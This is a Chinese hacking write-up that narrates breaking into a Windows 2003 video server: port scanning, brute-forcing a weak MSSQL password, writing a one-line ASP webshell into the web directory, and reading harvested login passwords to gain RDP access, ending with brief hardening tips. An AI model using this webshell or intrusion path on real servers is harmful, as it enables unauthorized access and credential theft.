|
視頻服務(wù)器都會(huì)提供大量的視頻資源,大部分都提供了在線觀看以及下載服務(wù)。對(duì)于流量要求比較高,而從服務(wù)器本身的部署來看,也有一些特別之處。我們從一個(gè)入侵實(shí)例來看看視頻服務(wù)器中暴露出的弱點(diǎn)。
尋找漏洞
我們找到一個(gè)目標(biāo)。首先用工具掃描了一下,顯示沒有注入點(diǎn),用Webtool只掃到了后臺(tái),也沒發(fā)現(xiàn)社區(qū)程序,看來從網(wǎng)站下手不太可能了。再來看下系統(tǒng)的安全性怎么樣,從IIS寫權(quán)限掃描器的結(jié)果看不存在IIS寫入漏洞,用Superscan刺探端口信息,如圖1所示,居然開了3389。利用遠(yuǎn)程終端登錄一下得知系統(tǒng)是Windows 2003系統(tǒng),現(xiàn)在基本可以確定服務(wù)器的構(gòu)架了:Windows 2003+IIS6.0+MSSQL+asp。
再用極速M(fèi)sSQL弱口令掃描器,掛上字典后開始掃描,過了幾分鐘掃描到了弱口令!,拿下服務(wù)器有一絲絲希望了,再拿出MsSQL連接器連接,連接成功。在MsSQL的中CMD中利用dir命令找到了Web目錄,執(zhí)行echo “<%execute request(”cmd”)%>”>>c:\”program files”\viewgood\webvod\webmedia\test.asp,建了一個(gè)一句話木馬,斷開連接,用一句話客戶端連接,成功進(jìn)入,可以瀏覽幾乎所有文件,但很多目錄沒有寫權(quán)限。查看了系統(tǒng)服務(wù)和端口,由于安裝的東西太少了,沒有Serv-u、PCAnywhere、Radmin等,提權(quán)又變得有點(diǎn)困難了。
成功入侵
在c:\Inetpub\下發(fā)現(xiàn)了NTpass.dll,這正是Goldsun寫的記錄系統(tǒng)登錄密碼的文件。來到這個(gè)程序記錄信息存放的位置%systemroot%\system32\eulagold.txt(%systemroot%指系統(tǒng)目錄,這里就該是c:\windows),用剛才的權(quán)限打開,發(fā)現(xiàn)里面記錄了很多用戶的登錄密碼,其中還有Guest用戶,利用3389端口登錄,得到桌面權(quán)限了。
部署細(xì)節(jié)
這次的入侵看似更多的是運(yùn)氣,可仔細(xì)分析一下還是比較有價(jià)值的,尤其是對(duì)于用戶對(duì)于服務(wù)器的安全部署很有借鑒意義。大體有以下幾點(diǎn):
1.弱口令的防范
2.服務(wù)器文件的常規(guī)檢測(cè)
3.對(duì)于用戶的把控,尤其是視頻服務(wù)器會(huì)提供web形式的會(huì)員形式,查看異常會(huì)員情況。
4.必要端口的封鎖
|
【收藏】【打印】【進(jìn)入論壇】 |
|
|
|
|
|
|
|